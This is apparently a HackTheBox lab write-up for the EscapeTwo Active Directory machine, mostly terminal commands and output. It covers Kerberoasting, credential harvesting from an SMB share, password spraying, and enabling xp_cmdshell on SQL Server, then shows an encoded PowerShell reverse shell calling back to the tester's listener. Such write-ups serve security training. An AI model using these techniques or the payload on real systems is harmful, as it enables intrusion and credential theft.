HackTheBox: EscapeTwo [Active Directory]
HackTheBox: EscapeTwo [Active Directory]
Table of Contents
[TOC]
Topic
Lab
- HackTheBox:
https://app.hackthebox.com/machines/EscapeTwo
Initial Enumeration
● Start Machine: 10.10.11.51
As is common in real life Windows pentests, you will start this box with credentials for the following account:
rose / KxEPkKe6R8su
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -Pn 10.10.11.51
Nmap scan report for 10.10.11.51
Host is up (0.39s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-18 07:47:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-04-18T07:48:35+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-04-18T07:48:34+00:00; -2s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-04-18T07:48:35+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-17T21:52:05
|_Not valid after: 2055-04-17T21:52:05
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-18T07:48:35+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-18T07:48:34+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-18T07:47:58
|_ start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.75 seconds
DNS, SMB, ldap, HTTP, kpasswd5, ms-sql, Kerberos
DC01.sequel.htb
Solution
1. Kerberoasting
靶機提供一組可用帳號密碼:rose / KxEPkKe6R8su
┌──(chw㉿CHW)-[~]
└─$ sudo impacket-GetUserSPNs -request -dc-ip 10.10.11.51 sequel.htb/rose
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------- ------- ---------------------------------------------------- -------------------------- -------------------------- ----------
sequel.htb/sql_svc.DC01 sql_svc CN=SQLRUserGroupSQLEXPRESS,CN=Users,DC=sequel,DC=htb 2024-06-09 03:58:42.689521 2025-05-06 11:01:23.377674
sequel.htb/ca_svc.DC01 ca_svc CN=Cert Publishers,CN=Users,DC=sequel,DC=htb 2025-05-06 16:02:28.965833 2025-05-06 12:40:01.700186
[-] CCache file is not found. Skipping...
$krb5tgs$23$*sql_svc$SEQUEL.HTB$sequel.htb/sql_svc*$a2804f96060bd317c7ceb551bede5a42$cce324d3dc6b920f72bbbb8dff929ecce777b59f1539a729e228aec0e8f850b3514be134d35b6cb382c9016c8b7b37048de571ebf81dcbf0a34640c2e4594ee5a70d3d27beba04bbdfcea71af7bf2f94705f4d6a259bfe00b8eb13cb92451f5e8a8417b2daa961de35c37bd4d026d530a1476396635fb402c55321eaa1718672f726956c4a7dba0e393334a5652e0f3c11116241c77bfff6f0e0f08f71f390628788cc7ba4cb09f14998314a9ab83600b8b983d038a241fdd45d9a312198868babec0ce1653898dfb933f91ed05a21c26ac4458f5d68fd9327d7863ab9336e20e8b940f63ea4749658dc93b64d988fdbcd3d4e653dd21f1ad81441d31f18504dfd1b25c03cfdedb04eda9c5f7449dffa5517d6d2eb1f1c6ee6930ca2ac105551446fa2290e9b64da8b9e524bbec04fb139b5bfe7b19c57d41510a2b21a067093d815f35bfe8bb561e7bbd10d0e05a86b6fe5a6a3ebe7d462b0cebca0472046a5c5e0d6cdf16a6674e29578b36bca3c018a9bc4eeba2adb847b142c2f29d8d573f91e34c4eac373f28f4ceec1bb76e4cfe7266e02dc40108022d0259fee1e2d38f79df61b7ca235893af142cf398440e1a6a24b5e1dc46640844a13a1d5d07ff5bed9ab2a8161660fa04b477fc1**********f25d66c7efe5e62daf44e5806ee9e96f32dbed034f741929d713d7f67a5b2ca67db618c727bdd6cd70592782617ce5ca82e880e35feb0f29eddd6eb84d6fe128f473360eedbc9afc2dabdde39f19cbfb7cda39dbf2daaa831ef78d3c4c5ae17ab4073f1b130dce68c3c551c12d75944f96dd2caf28718c452e4de40c6d266f1ab5bae2fcacc0e0653f5218fa957a871df665a54a71ec93253f06570ea1eea5f2cf6db93954447934fc31b5a71bed0789fcbc31be24c45eef7cefca65971a85ba34e09ea937cd7086bc5bb1dae79df11b508887e485522124ab7e984d3aa75a321ed5577c9ddb3a7208651806a613b8f79cca199fbe523cc898e2c2bbec0a691759a40d3c1df5ffec170e3eb7b66909e854bdeed2c0b1b1f79e199eeb7aeb4331ac4aa1693dc9976595c0a583ae940fe60b1192cce6d0fc9575f7188c1107a14c6aabed5631183051fa4012a32556ee7fd49fecd4be31e1bc18939617c00714e8188ea43a08f294234d12575586c794e6833008a559b31dfc5db3121b56c7844a82f61e05a8b6e8ca07d34adbf2daff5c54831693182ae76c112d1f6d0a0e490111cd63429a7d57dec82c77fda7be12d535aa0fc502ea7437fa03977df0859384b5b7fe549141831821727c986ead46e784fbc9e35349bd9fcd6d826bc2a45908b1737e133e6f8e406ff5e81b0a0d40d3a089acad9635c3b84fe33049e760adcc97cd40e3e84132957295586fda0ff8ab33529b0f7894ffbc**********
$krb5tgs$23$*ca_svc$SEQUEL.HTB$sequel.htb/ca_svc*$2d99e251b2a4e1df55a4b89d72b41f19$e187a02a4e24d8c37ca81f79817ec30b3146e7be7b435f29183216be9510b44520734a551701ac4a1f2d796823595ab38249d2b2c79ebbb174fb15f532b92a03a62ab4c855e492a7da64989a81c94e58280fa5fbe35a829c7e3d531da10418bc9444b785ebb4c3fc889738411f5cbe93ea310c1bc4c6b6624dbc67f8d50452ad320a880f37369aa14555bff721c7fd4d68f5aa389570fecdd9bb64f6e6bb5518e84e8378514366ed87a41eeaef2759d887f8ca71b3528f53841b7000b33179a7ab702258765cd17ec68ec740f92aecb11f23f4c178da91505c0a62f3c8fd91f511a7a5d1f4be8c5eea2204d5243b99c32136b15b5d675f238534a636a9279243f9099b130b69827a23e2cd4a1ea962199eeb4d086c339f1cd11dbe9ef5ff19b0f9d5e9437df379bf438313305cd6126eefc83e4149bfad5d694d510835118c9204e4d9322387b29ab46a3a0c680356c8a6bc4271dd1b7c19f59c9b5af9165835986fb5bbf84a197f06a62a195eb11f430c18f71419b7912900dc8cff5b154c5d58624eb5e24563aadfcec7a5cc19f88e1e27863eca6ac2e68b0e0493c8c537a361804a18a0d08391e8692f9b34d032dbbd789cde7d2308a3690cfff6ec1702471d59bab0cdc99d50466187e1fc99a4f41d35edbe973c24085fa93de5459ce21f1cd6b368add5f19ca09aafc7053a7166424f5c043aaeda021350585ddedc66ec4836c947b94e282bcbac98ae0a0f7f48f5adc8c454e7da7f8877308046f18efdbaaa53b9266461cbc12a1b7cfb8a1e5afd79443423cfb4ac78f9c2edc3d487e044d12a1fcc3265f8f96630308e8c851110ca3d7729f0199f084070a9f3851585a614a30b03d587a131feef94e99d035170d5b8e2c2f8c25f3a5db23fa0e452d0ae658ed46f4ff00af815a2e30ae695658484e57e6ea8a6a595e5b889e45d95960c04f9fefe900a16b116345c7911d432aba075f0c066a766a8e792b4ae6e45ab9d8a54531b79676e475676b643ab7a73dd5117890172d232985a240c6c265ebdf81d5d6b6e4609b11c07978c1a5dad14be7221ca3cdec0478d671bd12cd952b7e50b454b6d38b9e25793320479d118a723c5829d7f87244856fc7c7099782618ea52c76944b5fa2c71787fe7f05d3dffc4fd7eff4889d86e8a4fe1d72c7193b0c4636ac211a6b19e80563c83eba4e89f8ace54ce7d70fc249bf6985372363fb808d56749a09caea490148e32617efd94b9ab677f665cf739e8b0272f16141f654cc0ab77f92d28f9ac1ecd964e6d8942cdd4dd45dc0988b90b204bda9631fb8644f942484e83d411a063f06615bad8b9074bf4921cec479aa4934f6de7c5ce1b9915bbc8f3332fbbd467fb83408953524f22784b94ee6c3b073c6df3dc1644c99cf0cb0b70158e60d8d5**********
取得兩組 SPN 服務帳號 (SPN Service Ticket):
sql_svc,ca_svc
爆破 Hash 明文密碼
┌──(chw㉿CHW)-[~]
└─$ cat EscapeTwo.hash
$krb5tgs$23$*sql_svc$SEQUEL.HTB$sequel.htb/sql_svc*$a2804f96060bd317c7ceb551bede5a42$cce324d3dc6b920f72bbbb8dff929ecce777b59f1539a729e228aec0e8f850b3514be134d35b6cb382c9016c8b7b37048de571ebf81dcbf0a34640c2e4594ee5a70d3d27beba04bbdfcea71af7bf2f94705f4d6a259bfe00b8eb13cb92451f5e8a8417b2daa961de35c37bd4d026d530a1476396635fb402c55321eaa1718672f726956c4a7dba0e393334a5652e0f3c11116241c77bfff6f0e0f08f71f390628788cc7ba4cb09f14998314a9ab83600b8b983d038a241fdd45d9a312198868babec0ce1653898dfb933f91ed05a21c26ac4458f5d68fd9327d7863ab9336e20e8b940f63ea4749658dc93b64d988fdbcd3d4e653dd21f1ad81441d31f18504dfd1b25c03cfdedb04eda9c5f7449dffa5517d6d2eb1f1c6ee6930ca2ac105551446fa2290e9b64da8b9e524bbec04fb139b5bfe7b19c57d41510a2b21a067093d815f35bfe8bb561e7bbd10d0e05a86b6fe5a6a3ebe7d462b0cebca0472046a5c5e0d6cdf16a6674e29578b36bca3c018a9bc4eeba2adb847b142c2f29d8d573f91e34c4eac373f28f4ceec1bb76e4cfe7266e02dc40108022d0259fee1e2d38f79df61b7ca235893af142cf398440e1a6a24b5e1dc46640844a13a1d5d07ff5bed9ab2a8161660fa04b477fc1**********f25d66c7efe5e62daf44e5806ee9e96f32dbed034f741929d713d7f67a5b2ca67db618c727bdd6cd70592782617ce5ca82e880e35feb0f29eddd6eb84d6fe128f473360eedbc9afc2dabdde39f19cbfb7cda39dbf2daaa831ef78d3c4c5ae17ab4073f1b130dce68c3c551c12d75944f96dd2caf28718c452e4de40c6d266f1ab5bae2fcacc0e0653f5218fa957a871df665a54a71ec93253f06570ea1eea5f2cf6db93954447934fc31b5a71bed0789fcbc31be24c45eef7cefca65971a85ba34e09ea937cd7086bc5bb1dae79df11b508887e485522124ab7e984d3aa75a321ed5577c9ddb3a7208651806a613b8f79cca199fbe523cc898e2c2bbec0a691759a40d3c1df5ffec170e3eb7b66909e854bdeed2c0b1b1f79e199eeb7aeb4331ac4aa1693dc9976595c0a583ae940fe60b1192cce6d0fc9575f7188c1107a14c6aabed5631183051fa4012a32556ee7fd49fecd4be31e1bc18939617c00714e8188ea43a08f294234d12575586c794e6833008a559b31dfc5db3121b56c7844a82f61e05a8b6e8ca07d34adbf2daff5c54831693182ae76c112d1f6d0a0e490111cd63429a7d57dec82c77fda7be12d535aa0fc502ea7437fa03977df0859384b5b7fe549141831821727c986ead46e784fbc9e35349bd9fcd6d826bc2a45908b1737e133e6f8e406ff5e81b0a0d40d3a089acad9635c3b84fe33049e760adcc97cd40e3e84132957295586fda0ff8ab33529b0f7894ffbc**********
$krb5tgs$23$*ca_svc$SEQUEL.HTB$sequel.htb/ca_svc*$2d99e251b2a4e1df55a4b89d72b41f19$e187a02a4e24d8c37ca81f79817ec30b3146e7be7b435f29183216be9510b44520734a551701ac4a1f2d796823595ab38249d2b2c79ebbb174fb15f532b92a03a62ab4c855e492a7da64989a81c94e58280fa5fbe35a829c7e3d531da10418bc9444b785ebb4c3fc889738411f5cbe93ea310c1bc4c6b6624dbc67f8d50452ad320a880f37369aa14555bff721c7fd4d68f5aa389570fecdd9bb64f6e6bb5518e84e8378514366ed87a41eeaef2759d887f8ca71b3528f53841b7000b33179a7ab702258765cd17ec68ec740f92aecb11f23f4c178da91505c0a62f3c8fd91f511a7a5d1f4be8c5eea2204d5243b99c32136b15b5d675f238534a636a9279243f9099b130b69827a23e2cd4a1ea962199eeb4d086c339f1cd11dbe9ef5ff19b0f9d5e9437df379bf438313305cd6126eefc83e4149bfad5d694d510835118c9204e4d9322387b29ab46a3a0c680356c8a6bc4271dd1b7c19f59c9b5af9165835986fb5bbf84a197f06a62a195eb11f430c18f71419b7912900dc8cff5b154c5d58624eb5e24563aadfcec7a5cc19f88e1e27863eca6ac2e68b0e0493c8c537a361804a18a0d08391e8692f9b34d032dbbd789cde7d2308a3690cfff6ec1702471d59bab0cdc99d50466187e1fc99a4f41d35edbe973c24085fa93de5459ce21f1cd6b368add5f19ca09aafc7053a7166424f5c043aaeda021350585ddedc66ec4836c947b94e282bcbac98ae0a0f7f48f5adc8c454e7da7f8877308046f18efdbaaa53b9266461cbc12a1b7cfb8a1e5afd79443423cfb4ac78f9c2edc3d487e044d12a1fcc3265f8f96630308e8c851110ca3d7729f0199f084070a9f3851585a614a30b03d587a131feef94e99d035170d5b8e2c2f8c25f3a5db23fa0e452d0ae658ed46f4ff00af815a2e30ae695658484e57e6ea8a6a595e5b889e45d95960c04f9fefe900a16b116345c7911d432aba075f0c066a766a8e792b4ae6e45ab9d8a54531b79676e475676b643ab7a73dd5117890172d232985a240c6c265ebdf81d5d6b6e4609b11c07978c1a5dad14be7221ca3cdec0478d671bd12cd952b7e50b454b6d38b9e25793320479d118a723c5829d7f87244856fc7c7099782618ea52c76944b5fa2c71787fe7f05d3dffc4fd7eff4889d86e8a4fe1d72c7193b0c4636ac211a6b19e80563c83eba4e89f8ace54ce7d70fc249bf6985372363fb808d56749a09caea490148e32617efd94b9ab677f665cf739e8b0272f16141f654cc0ab77f92d28f9ac1ecd964e6d8942cdd4dd45dc0988b90b204bda9631fb8644f942484e83d411a063f06615bad8b9074bf4921cec479aa4934f6de7c5ce1b9915bbc8f3332fbbd467fb83408953524f22784b94ee6c3b073c6df3dc1644c99cf0cb0b70158e60d8d5**********
┌──(chw㉿CHW)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --rules=/usr/share/hashcat/rules/best64.rule EscapeTwo.hash
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
No "/usr/share/hashcat/rules/best64.rule" mode rules found in /etc/john/john.conf
無法爆出明文密碼
2. LdapSearch
┌──(chw㉿CHW)-[~/Tools/impacket/examples]
└─$ impacket-ldapsearch -u rose -p 'KxEPkKe6R8su' -d sequel.htb -dc-ip 10.10.11.51 -l 10.10.11.51 -t all
### Server infos ###
[+] Forest functionality level = Windows 2016
[+] Domain functionality level = Windows 2016
[+] Domain controller functionality level = Windows 2016
[+] rootDomainNamingContext = DC=sequel,DC=htb
[+] defaultNamingContext = DC=sequel,DC=htb
[+] ldapServiceName = sequel.htb:dc01$@SEQUEL.HTB
[+] naming_contexts = ['DC=sequel,DC=htb', 'CN=Configuration,DC=sequel,DC=htb', 'CN=Schema,CN=Configuration,DC=sequel,DC=htb', 'DC=DomainDnsZones,DC=sequel,DC=htb', 'DC=ForestDnsZones,DC=sequel,DC=htb']
### Result of "trusts" command ###
### Result of "pass-pols" command ###
[+] Default password policy:
[+] |__ Minimum password length = 7
[+] |__ Password complexity = Disabled
[*] |__ Lockout threshold = Disabled
[*] |__ Password history length = 24
[+] |__ Max password age = 42 days, 0 hours, 0 minutes, 0 seconds
[+] |__ Min password age = 24 hours, 0 minutes, 0 seconds
[+] No fine grained password policy found (high privileges are required).
### Result of "admins" command ###
[+] All members of group "Domain Admins":
[*] Administrator (DONT_EXPIRE_PASSWORD)
[+] All members of group "Administrators":
[*] Administrator (DONT_EXPIRE_PASSWORD)
[+] All members of group "Enterprise Admins":
[*] Administrator (DONT_EXPIRE_PASSWORD)
### Result of "kerberoast" command ###
[*] ca_svc: sequel.htb/ca_svc.DC01
[*] sql_svc: sequel.htb/sql_svc.DC01
### Result of "asreqroast" command ###
### Result of "goldenticket" command ###
[+] krbtgt password changed at 2024-06-08 16:40:23
密碼最小長度為 7
其他沒有找到可用線索
3. Smbclient
┌──(chw㉿CHW)-[~]
└─$ smbclient -L //10.10.11.51 -U "rose"
Password for [WORKGROUP\rose]:
Sharename Type Comment
--------- ---- -------
Accounting Department Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.51 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(chw㉿CHW)-[~]
└─$ smbclient //10.10.11.51/Users -U "rose"
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Jun 9 09:42:11 2024
.. DR 0 Sun Jun 9 09:42:11 2024
Default DHR 0 Sun Jun 9 07:17:29 2024
desktop.ini AHS 174 Sat Sep 15 03:16:48 2018
6367231 blocks of size 4096. 928252 blocks available
smb: \>
┌──(chw㉿CHW)-[~]
└─$ smbclient //10.10.11.51/Accounting\ Department -U "rose"
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024
6367231 blocks of size 4096. 900385 blocks available
smb: \>
SMB File Leak:
- /User
Default,desktop.ini- Accounting Department
accounting_2024.xlsx,accounts.xlsx
下載檔案
┌──(chw㉿CHW)-[~]
└─$ smbclient //10.10.11.51/Accounting\ Department -U "rose" -c "recurse ON; prompt OFF; mget *"
Password for [WORKGROUP\rose]:
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (4.9 KiloBytes/sec) (average 4.9 KiloBytes/sec)
getting file \accounts.xlsx of size 6780 as accounts.xlsx (6.3 KiloBytes/sec) (average 5.4 KiloBytes/sec)
┌──(chw㉿CHW)-[~]
└─$ smbclient //10.10.11.51/Users -U "rose" -c "recurse ON; prompt OFF; mget *"
Password for [WORKGROUP\rose]:
getting file \desktop.ini of size 174 as desktop.ini (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \Default\NTUSER.DAT of size 262144 as Default/NTUSER.DAT (59.7 KiloBytes/sec) (average 49.8 KiloBytes/sec)
getting file \Default\NTUSER.DAT.LOG1 of size 57344 as Default/NTUSER.DAT.LOG1 (48.7 KiloBytes/sec) (average 49.6 KiloBytes/sec)
getting file \Default\NTUSER.DAT.LOG2 of size 0 as Default/NTUSER.DAT.LOG2 (0.0 KiloBytes/sec) (average 44.2 KiloBytes/sec)
getting file \Default\NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf of size 65536 as Default/NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf (55.8 KiloBytes/sec) (average 45.9 KiloBytes/sec)
...
下載後的 accounting_2024.xlsx, accounts.xlsx 是壓縮檔
在 accounts.xlsx 中的 xl/sharedStrings.xml 找到帳號密碼:
整理過後:
First Name Last Name Email Username Password
- Angela Martin angela@sequel.htb
angela0fwz7Q4mSpurIt99- Oscar Martinez oscar@sequel.htb
oscar86LxLBMgEWaKUnBG- Kevin Malone kevin@sequel.htb
kevinMd9Wlq1E5bZnVDVo- NULL sa@sequel.htb
saMSSQLP@ssw0rd!
3.1 嘗試 SMB 登入
┌──(chw㉿CHW)-[~]
└─$ cat EscapeTwo_name.txt
sa
angela
oscar
kevin
┌──(chw㉿CHW)-[~]
└─$ cat EscapeTwo_pwd.txt
MSSQLP@ssw0rd!
0fwz7Q4mSpurIt99
86LxLBMgEWaKUnBG
Md9Wlq1E5bZnVDVo
┌──(chw㉿CHW)-[~]
└─$ crackmapexec smb 10.10.11.51 -u EscapeTwo_name.txt -p EscapeTwo_pwd.txt
...
SMB 10.10.11.51 445 DC01 [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 10.10.11.51 445 DC01 [-] sequel.htb\oscar:MSSQLP@ssw0rd! STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [-] sequel.htb\oscar:0fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE
SMB 10.10.11.51 445 DC01 [+] sequel.htb\oscar:86LxLBMgEWaKUnBG
oscar:86LxLBMgEWaKUnBG成功登入 SMB
Enumerate 後沒有發現其他可用資訊
3.2 嘗試 Mssql 登入
使用同一組帳號密碼嘗試登入 Mssql
以 escapetwo.htb/sa:MSSQLP@ssw0rd! 成功登入
┌──(chw㉿CHW)-[~]
└─$ impacket-mssqlclient 'escapetwo.htb/sa:MSSQLP@ssw0rd!@10.10.11.51'
Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)>
嘗試 xp_cmdshell RCE
SQL (sa dbo@master)> EXEC xp_cmdshell 'whoami';
ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (sa dbo@master)> EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> EXEC xp_cmdshell 'whoami';
output
--------------
sequel\sql_svc
NULL
SQL (sa dbo@master)>
- SQL Server 預設把 xp_cmdshell 關閉
sp_configure用來查詢或設定伺服器層級的參數
show advanced options控制是否允許調整進階設定(預設為 0)。 將參數設為 1 並執行 RECONFIGURE,告訴 SQL Server 接受並套用「顯示進階選項」的變更EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
在允許進階設定後,用同樣方式將 xp_cmdshell 開啟(設為 1),並 RECONFIGURE 套用。
成功取得 SQL Server Shell,🥚 過幾分鐘就會 xp_cmdshell又會被關閉
👉🏻 嘗試執行 Reverse Shell
4. Mssql 塞入 Reverse Shell
參考 hackingarticles 如何建立 Mssql reverse shell
透過 Reverse Shell Generator 生成 Windows Reverse Shell payload
SQL (sa dbo@master)> EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA3ADkAIgAsADgAOAA4ADgAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdA
開啟監聽 port
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
成功取得 Reverse Shell
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [10.10.14.179] from (UNKNOWN) [10.10.11.51] 49199
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Windows\system32> whoami
sequel\sql_svc
PS C:\Windows\system32>
4.1 檢查 localgroup
PS C:\Windows\system32> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.
想太美 🥶
4.2 尋找相關憑證 / 密碼
PS C:\Windows\system32> Get-ChildItem -Recurse -Path C:\Users -Include *.xml,*.ini,*.txt,*.config -ErrorAction SilentlyContinue
PS C:\Windows\system32> Get-ChildItem -Recurse -Path C:\ -Include *.xml,*.ini,*.txt,*.config -ErrorAction SilentlyContinue
...
Directory: C:\Program Files\Microsoft SQL Server\150\DTS\Binn
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/24/2019 2:40 PM 1898 DTExec.exe.config
-a---- 9/24/2019 2:40 PM 1898 dtshost.exe.config
-a---- 9/24/2019 2:40 PM 4470 DTSPERF.INI
-a---- 9/24/2019 2:40 PM 1898 DTSWizard.exe.config
-a---- 9/24/2019 2:40 PM 1898 DTUtil.exe.config
-a---- 9/24/2019 2:40 PM 71494 DtwTypeConversion.xml
Directory: C:\Program Files\Microsoft SQL Server\150\DTS\Connections\en
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/24/2019 2:40 PM 22303 Microsoft.SqlServer.ManagedConnections.xml
...
Directory: C:\Program Files (x86)\Microsoft SQL Server Management Studio 20\Common7\IDE\SqlToolsData\1033
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/31/2024 3:21 AM 41535 MDXFunctions.xml
-a---- 1/31/2024 3:21 AM 134188 MDXTemplates.xml
-a---- 4/3/2024 3:48 PM 6177 OleSqlCommands.xml
-a---- 4/3/2024 3:48 PM 95504 SqlCommonObjects.xml
-a---- 4/3/2024 3:48 PM 619 SqlProductions.xml
-a---- 4/3/2024 3:48 PM 15539 SqlTemplateData.xml
-a---- 4/3/2024 3:48 PM 609757 StoredProcedures.xml
...
Directory: C:\SQL2019\ExpressAdv_ENU\1033_ENU_LP
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/24/2019 5:57 PM 207 MEDIAINFO.XML
Directory: C:\SQL2019\ExpressAdv_ENU\x64
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/24/2019 5:20 PM 12028 ADDNODE.XML
-a---- 9/24/2019 5:20 PM 11893 COMPLETECLUSTERWIZARD.XML
-a---- 9/24/2019 5:20 PM 15305 COMPLETEIMAGEWIZARD.XML
-a---- 9/24/2019 5:20 PM 3061 COMPONENTUPDATE.XML
-a---- 9/24/2019 5:20 PM 5673 EDITIONUPGRADEWIZARD.XML
-a---- 9/24/2019 5:20 PM 486 FIXSQLREGISTRYKEY_X64.EXE.CONFIG
-a---- 9/24/2019 5:20 PM 486 FIXSQLREGISTRYKEY_X86.EXE.CONFIG
